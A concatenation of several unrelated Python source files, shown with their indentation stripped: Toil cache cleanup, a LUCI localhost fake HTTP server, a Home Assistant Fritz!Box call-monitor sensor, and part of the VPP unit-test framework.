cache directory, containing cache state database. Job
local temp directories will be removed due to their
appearance in the database.
"""
if os.path.isdir(dir_):
# There is a directory to clean up
# We need the database for the most recent workflow attempt so we
# can clean up job temp directories.
# We don't have access to a class instance, nor do we have access
# to the workflow attempt number that we would need in order to
# find the right database by just going to it. We can't have a link
# to the current database because opening SQLite databases under
# multiple names breaks SQLite's atomicity guarantees (because you
# can't find the journal).
# So we just go and find the cache-n.db with the largest n value,
# and use that.
dbFilename = None
dbAttempt = float('-inf')
for dbCandidate in os.listdir(dir_):
# For each thing in the directory
match = re.match('cache-([0-9]+).db', dbCandidate)
if match and int(match.group(1)) > dbAttempt:
# If it looks like a caching database and it has a higher
# number than any other one we have seen, use it.
dbFilename = dbCandidate
dbAttempt = int(match.group(1))
if dbFilename is not None:
# We found a caching database
logger.debug('Connecting to latest caching database %s for cleanup', dbFilename)
dbPath = os.path.join(dir_, dbFilename)
if os.path.exists(dbPath):
try:
# The database exists, see if we can open it
con = sqlite3.connect(dbPath, timeout=SQLITE_TIMEOUT_SECS)
except:
# Probably someone deleted it.
pass
else:
# We got a database connection
# Create the tables if they don't exist so deletion of dead
# jobs won't fail.
cls._ensureTables(con)
# Remove dead jobs and their job directories (not under the
# cache)
cls._removeDeadJobs(dir_, con)
con.close()
else:
logger.debug('No caching database found in %s', dir_)
# Whether or not we found a database, we need to clean up the cache
# directory. Delete the state DB if any and everything cached.
robust_rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.waitForCommit()
@classmethod
def _removeDeadJobs(cls, workDir, con):
"""
Look at the state of all jobs registered in the database, and handle them
(clean up the disk)
:param str workDir: Toil work directory.
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
# Work out our process name for taking ownership of jobs
me = get_process_name(workDir)
# Get all the dead worker PIDs
workers = []
for row in cur.execute('SELECT DISTINCT worker FROM jobs WHERE worker IS NOT NULL'):
workers.append(row[0])
# Work out which of them are not currently running.
# TODO: account for PID reuse somehow.
deadWorkers = []
for worker in workers:
if not process_name_exists(workDir, worker):
deadWorkers.append(worker)
# Now we know which workers are dead.
# Clear them off of the jobs they had.
for deadWorker in deadWorkers:
cls._staticWrite(con, cur, [('UPDATE jobs SET worker = NULL WHERE worker = ?', (deadWorker,))])
if len(deadWorkers) > 0:
logger.debug('Reaped %d dead workers', len(deadWorkers))
while True:
# Find an unowned job.
# Don't take all of them; other people could come along and want to help us with the other jobs.
cur.execute('SELECT id FROM jobs WHERE worker IS NULL LIMIT 1')
row = cur.fetchone()
if row is None:
# We cleaned up all the jobs
break
jobID = row[0]
# Try to own this job
cls._staticWrite(con, cur, [('UPDATE jobs SET worker = ? WHERE id = ? AND worker IS NULL', (me, jobID))])
# See if we won the race
cur.execute('SELECT id, tempdir FROM jobs WHERE id = ? AND worker = ?', (jobID, me))
row = cur.fetchone()
if row is None:
# We didn't win the race. Try another one.
continue
# If we did win, delete the job and its files and temp dir
cls._removeJob(con, cur, jobID)
logger.debug('Cleaned up orphanded job %s', jobID)
# Now we have cleaned up all the jobs that belonged to dead workers that were dead when we entered this function.
|
httpserver.py
|
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import json
import logging
import threading
from six.moves import BaseHTTPServer
from six.moves import http_client
_STOP_EVENT = '/fakeserver/__stop__'
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handlers implements utility functions to help implementing a fake."""
### Public methods
def send_json(self, data):
"""Sends a JSON response."""
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
json.dump(data, self.wfile)
def send_octet_stream(self, data):
"""Sends a binary response."""
self.send_response(200)
self.send_header('Content-type', 'application/octet-stream')
self.end_headers()
self.wfile.write(data)
def read_body(self):
"""Reads the request body."""
return self.rfile.read(int(self.headers['Content-Length']))
def yield_body(self):
"""Yields the request body as 4kiB chunks."""
size = int(self.headers['Content-Length'])
while size:
chunk = min(4096, size)
yield self.rfile.read(chunk)
size -= chunk
### Overrides from BaseHTTPRequestHandler
def do_OPTIONS(self):
if self.path == _STOP_EVENT:
self.server.parent._stopped = True
self.send_octet_stream('')
def log_message(self, fmt, *args):
logging.info(
'%s - - [%s] %s', self.address_string(), self.log_date_time_string(),
fmt % args)
class Server(object):
"""Server implements a simple HTTP server to implement a fake."""
_HANDLER_CLS = None
def __init__(self):
assert issubclass(self._HANDLER_CLS, Handler), self._HANDLER_CLS
self._closed = False
self._stopped = False
self._server = BaseHTTPServer.HTTPServer(
('127.0.0.1', 0), self._HANDLER_CLS)
self._server.parent = self
self._server.url = self.url = 'http://127.0.0.1:%d' % (
self._server.server_port)
self._thread = threading.Thread(target=self._run, name='httpd')
self._thread.daemon = True
self._thread.start()
logging.info('%s', self.url)
def close(self):
assert not self._closed
self._closed = True
self._send_event(_STOP_EVENT)
self._thread.join()
def _run(self):
while not self._stopped:
self._server.handle_request()
self._server.server_close()
def _send_event(self, path):
conn = http_client.HTTPConnection(
'127.0.0.1:%d' % self._server.server_port, timeout=60)
try:
conn.request('OPTIONS', path)
conn.getresponse()
finally:
conn.close()
|
sensor.py
|
"""Sensor to monitor incoming/outgoing phone calls on a Fritz!Box router."""
from datetime import datetime, timedelta
import logging
import queue
from threading import Event as ThreadingEvent, Thread
from time import sleep
from fritzconnection.core.fritzmonitor import FritzMonitor
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity
from homeassistant.config_entries import SOURCE_IMPORT
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP,
)
import homeassistant.helpers.config_validation as cv
from .const import (
ATTR_PREFIXES,
CONF_PHONEBOOK,
CONF_PREFIXES,
DEFAULT_HOST,
DEFAULT_NAME,
DEFAULT_PHONEBOOK,
DEFAULT_PORT,
DEFAULT_USERNAME,
DOMAIN,
FRITZ_STATE_CALL,
FRITZ_STATE_CONNECT,
FRITZ_STATE_DISCONNECT,
FRITZ_STATE_RING,
FRITZBOX_PHONEBOOK,
ICON_PHONE,
MANUFACTURER,
SERIAL_NUMBER,
STATE_DIALING,
STATE_IDLE,
STATE_RINGING,
STATE_TALKING,
UNKNOWN_NAME,
)
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PHONEBOOK, default=DEFAULT_PHONEBOOK): cv.positive_int,
vol.Optional(CONF_PREFIXES): vol.All(cv.ensure_list, [cv.string]),
}
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Import the platform into a config entry."""
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_IMPORT}, data=config
)
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the fritzbox_callmonitor sensor from config_entry."""
fritzbox_phonebook = hass.data[DOMAIN][config_entry.entry_id][FRITZBOX_PHONEBOOK]
phonebook_name = config_entry.title
phonebook_id = config_entry.data[CONF_PHONEBOOK]
prefixes = config_entry.options.get(CONF_PREFIXES)
serial_number = config_entry.data[SERIAL_NUMBER]
host = config_entry.data[CONF_HOST]
port = config_entry.data[CONF_PORT]
name = f"{fritzbox_phonebook.fph.modelname} Call Monitor {phonebook_name}"
unique_id = f"{serial_number}-{phonebook_id}"
sensor = FritzBoxCallSensor(
name=name,
unique_id=unique_id,
fritzbox_phonebook=fritzbox_phonebook,
prefixes=prefixes,
host=host,
port=port,
)
hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_STOP, sensor.async_will_remove_from_hass()
)
async_add_entities([sensor])
class FritzBoxCallSensor(SensorEntity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, unique_id, fritzbox_phonebook, prefixes, host, port):
"""Initialize the sensor."""
self._state = STATE_IDLE
self._attributes = {}
self._name = name.title()
self._unique_id = unique_id
self._fritzbox_phonebook = fritzbox_phonebook
self._prefixes = prefixes
self._host = host
self._port = port
self._monitor = None
async def async_added_to_hass(self):
"""Connect to FRITZ!Box to monitor its call state."""
_LOGGER.debug("Starting monitor for: %s", self.entity_id)
self._monitor = FritzBoxCallMonitor(
host=self._host,
port=self._port,
sensor=self,
)
self._monitor.connect()
async def async_will_remove_from_hass(self):
"""Disconnect from FRITZ!Box by stopping monitor."""
if (
self._monitor
and self._monitor.stopped
and not self._monitor.stopped.is_set()
and self._monitor.connection
and self._monitor.connection.is_alive
):
self._monitor.stopped.set()
self._monitor.connection.stop()
_LOGGER.debug("Stopped monitor for: %s", self.entity_id)
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def name(self):
"""Return name of this sensor."""
return self._name
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
return self._fritzbox_phonebook is not None
@property
def native_value(self):
"""Return the state of the device."""
return self._state
@property
def icon(self):
"""Return the icon of the sensor."""
return ICON_PHONE
@property
def extra_state_attributes(self):
"""Return the state attributes."""
if self._prefixes:
self._attributes[ATTR_PREFIXES] = self._prefixes
return self._attributes
@property
def device_info(self):
"""Return device specific attributes."""
return {
"name": self._fritzbox_phonebook.fph.modelname,
"identifiers": {(DOMAIN, self._unique_id)},
"manufacturer": MANUFACTURER,
"model": self._fritzbox_phonebook.fph.modelname,
"sw_version": self._fritzbox_phonebook.fph.fc.system_version,
}
@property
def unique_id(self):
"""Return the unique ID of the device."""
return self._unique_id
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self._fritzbox_phonebook is None:
return UNKNOWN_NAME
return self._fritzbox_phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self._fritzbox_phonebook is not None:
self._fritzbox_phonebook.update_phonebook()
class FritzBoxCallMonitor:
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.connection = None
self.stopped = ThreadingEvent()
self._sensor = sensor
def connect(self):
"""Connect to the Fritz!Box."""
_LOGGER.debug("Setting up socket connection")
try:
self.connection = FritzMonitor(address=self.host, port=self.port)
kwargs = {"event_queue": self.connection.start()}
Thread(target=self._process_events, kwargs=kwargs).start()
except OSError as err:
self.connection = None
_LOGGER.error(
"Cannot connect to %s on port %s: %s", self.host, self.port, err
)
def _process_events(self, event_queue):
"""Listen to incoming or outgoing calls."""
_LOGGER.debug("Connection established, waiting for events")
while not self.stopped.is_set():
try:
event = event_queue.get(timeout=10)
except queue.Empty:
if not self.connection.is_alive and not self.stopped.is_set():
_LOGGER.error("Connection has abruptly ended")
_LOGGER.debug("Empty event queue")
continue
else:
_LOGGER.debug("Received event: %s", event)
self._parse(event)
sleep(1)
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == FRITZ_STATE_RING:
self._sensor.set_state(STATE_RINGING)
att = {
"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime,
"from_name": self._sensor.number_to_name(line[3]),
}
self._sensor.set_attributes(att)
elif line[1] == FRITZ_STATE_CALL:
self._sensor.set_state(STATE_DIALING)
att = {
"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime,
"to_name": self._sensor.number_to_name(line[5]),
}
self._sensor.set_attributes(att)
elif line[1] == FRITZ_STATE_CONNECT:
self._sensor.set_state(STATE_TALKING)
att = {
"with": line[4],
"device": line[3],
"accepted": isotime,
"with_name": self._sensor.number_to_name(line[4]),
}
self._sensor.set_attributes(att)
elif line[1] == FRITZ_STATE_DISCONNECT:
self._sensor.set_state(STATE_IDLE)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
|
framework.py
|
#!/usr/bin/env python
from __future__ import print_function
import gc
import sys
import os
import select
import unittest
import tempfile
import time
import faulthandler
import random
import copy
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
from scapy.packet import Raw
from hook import StepHook, PollHook, VppDiedError
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_papi_provider import VppPapiProvider
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
getLogger, colorize
from vpp_object import VppObjectRegistry
if os.name == 'posix' and sys.version_info[0] < 3:
# using subprocess32 is recommended by python official documentation
# @ https://docs.python.org/2/library/subprocess.html
import subprocess32 as subprocess
else:
import subprocess
debug_framework = False
if os.getenv('TEST_DEBUG', "0") == "1":
debug_framework = True
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.wait(0):
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.debug(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.debug(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the flag will take care
# of properly terminating the loop
def running_extended_tests():
s = os.getenv("EXTENDED_TESTS", "n")
return True if s.lower() in ("y", "yes", "1") else False
def running_on_centos():
os_id = os.getenv("OS_ID", "")
return True if "centos" in os_id.lower() else False
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if hasattr(self, '_pipe'):
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = test.__name__
else:
desc = test.shortDescription()
if not desc:
desc = str(test)
self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
class VppTestCase(unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb":
cls.debug_gdb = True
elif dl == "gdbserver":
cls.debug_gdbserver = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
s = os.getenv("STEP", "n")
cls.step = True if s.lower() in ("y", "yes", "1") else False
d = os.getenv("DEBUG", None)
c = os.getenv("CACHE_OUTPUT", "1")
cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
cls.set_debug_flags(d)
cls.vpp_bin = os.getenv('VPP_TEST_BIN', "vpp")
cls.plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
plugin_path = None
if cls.plugin_path is not None:
if cls.extern_plugin_path is not None:
plugin_path = "%s:%s" % (
cls.plugin_path, cls.extern_plugin_path)
else:
plugin_path = cls.plugin_path
elif cls.extern_plugin_path is not None:
plugin_path = cls.extern_plugin_path
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
coredump_size = None
size = os.getenv("COREDUMP_SIZE")
if size is not None:
coredump_size = "coredump-size %s" % size
if coredump_size is None:
coredump_size = "coredump-size unlimited"
cls.vpp_cmdline = [cls.vpp_bin, "unix",
"{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "}", "api-trace", "{", "on", "}",
"api-segment", "{", "prefix", cls.shm_prefix, "}",
"plugins", "{", "plugin", "dpdk_plugin.so", "{",
"disable", "}", "}", ]
if plugin_path is not None:
cls.vpp_cmdline.extend(["plugin_path", plugin_path])
cls.logger.info("vpp_cmdline: %s" % cls.vpp_cmdline)
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug the VPP using e.g.:")
if cls.debug_gdbserver:
print("gdb " + cls.vpp_bin + " -ex 'target remote localhost:7777'")
print("Now is the time to attach a gdb by running the above "
"command, set up breakpoints etc. and then resume VPP from "
"within gdb by issuing the 'continue' command")
elif cls.debug_gdb:
print("gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
print("Now is the time to attach a gdb by running the above "
"command and set up breakpoints etc.")
print(single_line_delim)
raw_input("Press ENTER to continue running the testcase...")
@classmethod
def run_vpp(cls):
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or \
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:7777'] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=1)
except Exception as e:
cls.logger.critical("Couldn't start vpp: %s" % e)
raise
cls.wait_for_enter()
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
gc.collect() # run garbage collection first
random.seed()
cls.logger = getLogger(cls.__name__)
cls.tempdir = tempfile.mkdtemp(
prefix='vpp-unittest-%s-' % cls.__name__)
cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.shm_prefix = cls.tempdir.split("/")[-1]
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, shm prefix is %s",
cls.tempdir, cls.shm_prefix)
cls.setUpConstants()
cls.reset_packet_infos()
cls._captures = []
cls._zombie_captures = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
cls.run_vpp()
cls.reporter.send_keep_alive(cls)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
cls.vapi = VppPapiProvider(cls.shm_prefix, cls.shm_prefix, cls)
if cls.step:
hook = StepHook(cls)
else:
hook = PollHook(cls)
cls.vapi.register_hook(hook)
cls.sleep(0.1, "after vpp startup, before initial poll")
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except Exception:
try:
cls.vapi.disconnect()
except Exception:
pass
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise
except Exception:
try:
cls.quit()
except Exception:
pass
raise
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
if (cls.debug_gdbserver or cls.debug_gdb) and hasattr(cls, 'vpp'):
cls.vpp.poll()
if cls.vpp.returncode is None:
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
raw_input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
os.write(cls.pump_thread_wakeup_pipe[1], 'ding dong wake up')
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stdderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.vapi.disconnect()
del cls.vapi
cls.vpp.poll()
if cls.vpp.returncode is None:
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
cls.vpp.communicate()
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if debug_framework:
debug_internal.on_tear_down_class(cls)
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
if not self.vpp_dead:
self.logger.debug(self.vapi.cli("show trace"))
self.logger.info(self.vapi.ppcli("show interface"))
self.logger.info(self.vapi.ppcli("show hardware"))
self.logger.info(self.vapi.ppcli("show error"))
self.logger.info(self.vapi.ppcli("show run"))
self.registry.remove_vpp_config(self.logger)
# Save/Dump VPP api trace log
api_trace = "vpp_api_trace.%s.log" % self._testMethodName
tmp_api_trace = "/tmp/%s" % api_trace
vpp_api_trace_log = "%s/%s" % (self.tempdir, api_trace)
self.logger.info(self.vapi.ppcli("api trace save %s" % api_trace))
self.logger.info("Moving %s to %s\n" % (tmp_api_trace,
vpp_api_trace_log))
os.rename(tmp_api_trace, vpp_api_trace_log)
self.logger.info(self.vapi.ppcli("api trace custom-dump %s" %
vpp_api_trace_log))
else:
self.registry.unregister_all(self.logger)
def setUp(self):
""" Clear trace before running each test"""
self.reporter.send_keep_alive(self)
self.logger.debug("--- setUp() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
if self.vpp_dead:
raise Exception("VPP is dead when setting up the test")
self.sleep(.1, "during setUp")
self.vpp_stdout_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vpp_stderr_deque.append(
"--- test setUp() for %s.%s(%s) starts here ---\n" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
self.vapi.cli("clear trace")
# store the test instance inside the test class - so that objects
# holding the class can access instance methods (like assertEqual)
type(self).test_instance = self
@classmethod
def pg_enable_capture(cls, interfaces=None):
"""
Enable capture on packet-generator interfaces
:param interfaces: iterable interface indexes (if None,
use self.pg_interfaces)
"""
if interfaces is None:
interfaces = cls.pg_interfaces
for i in interfaces:
i.enable_capture()
@classmethod
def register_capture(cls, cap_name):
""" Register a capture in the testclass """
# add to the list of captures with current timestamp
cls._captures.append((time.time(), cap_name))
# filter out from zombies
cls._zombie_captures = [(stamp, name)
for (stamp, name) in cls._zombie_captures
if name != cap_name]
@classmethod
def pg_start(cls):
""" Remove any zombie captures and enable the packet generator """
# how long before capture is allowed to be deleted - otherwise vpp
# crashes - 100ms seems enough (this shouldn't be needed at all)
capture_ttl = 0.1
now = time.time()
for stamp, cap_name in cls._zombie_captures:
wait = stamp + capture_ttl - now
if wait > 0:
cls.sleep(wait, "before deleting capture %s" % cap_name)
now = time.time()
cls.logger.debug("Removing zombie capture %s" % cap_name)
cls.vapi.cli('packet-generator delete %s' % cap_name)
cls.vapi.cli("trace add pg-input 50") # 50 is maximum
cls.vapi.cli('packet-generator enable')
cls._zombie_captures = cls._captures
cls._captures = []
@classmethod
def create_pg_interfaces(cls, interfaces):
"""
Create packet-generator interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppPGInterface(cls, i)
setattr(cls, intf.name, intf)
result.append(intf)
cls.pg_interfaces = result
return result
@classmethod
def create_loopback_interfaces(cls, interfaces):
"""
Create loopback interfaces.
:param interfaces: iterable indexes of the interfaces.
:returns: List of created interfaces.
"""
result = []
for i in interfaces:
intf = VppLoInterface(cls, i)
setattr(cls, intf.name, intf)
result.append(intf)
cls.lo_interfaces = result
return result
@staticmethod
def extend_packet(packet, size, padding=' '):
"""
Extend packet to given size by padding with spaces or custom padding
NOTE: Currently works only when Raw layer is present.
:param packet: packet
:param size: target size
:param padding: padding used to extend the payload
"""
packet_len = len(packet) + 4
extend = size - packet_len
if extend > 0:
num = (extend / len(padding)) + 1
packet[Raw].load += (padding * num)[:extend]
@classmethod
def reset_packet_infos(cls):
""" Reset the list of packet info objects and packet counts to zero """
cls._packet_infos = {}
cls._packet_count_for_dst_if_idx = {}
@classmethod
def create_packet_info(cls, src_if, dst_if):
"""
Create packet info object containing the source and destination indexes
and add it to the testcase's packet info list
:param VppInterface src_if: source interface
:param VppInterface dst_if: destination interface
:returns: _PacketInfo object
"""
info = _PacketInfo()
info.index = len(cls._packet_infos)
info.src = src_if.sw_if_index
info.dst = dst_if.sw_if_index
if isinstance(dst_if, VppSubInterface):
dst_idx = dst_if.parent.sw_if_index
else:
dst_idx = dst_if.sw_if_index
if dst_idx in cls._packet_count_for_dst_if_idx:
cls._packet_count_for_dst_if_idx[dst_idx] += 1
else:
cls._packet_count_for_dst_if_idx[dst_idx] = 1
cls._packet_infos[info.index] = info
return info
@staticmethod
def info_to_payload(info):
"""
Convert _PacketInfo object to packet payload
:param info: _PacketInfo object
:returns: string containing serialized data from packet info
"""
return "%d %d %d %d %d" % (info.index, info.src, info.dst,
info.ip, info.proto)
@staticmethod
def payload_to_info(payload):
"""
Convert packet payload to _PacketInfo object
:param payload: packet payload
:returns: _PacketInfo object containing de-serialized data from payload
"""
numbers = payload.split()
info = _PacketInfo()
info.index = int(numbers[0])
info.src = int(numbers[1])
info.dst = int(numbers[2])
info.ip = int(numbers[3])
info.proto = int(numbers[4])
return info
def get_next_packet_info(self, info):
"""
Iterate over the packet info list stored in the testcase
Start iteration with first element if info is None
Continue based on index in info if info is specified
:param info: info or None
:returns: next info in list or None if no more infos
"""
if info is None:
next_index = 0
else:
next_index = info.index + 1
if next_index == len(self._packet_infos):
return None
else:
return self._packet_infos[next_index]
def get_next_packet_info_for_interface(self, src_index, info):
"""
Search the packet info list for the next packet info with same source
interface index
:param src_index: source interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
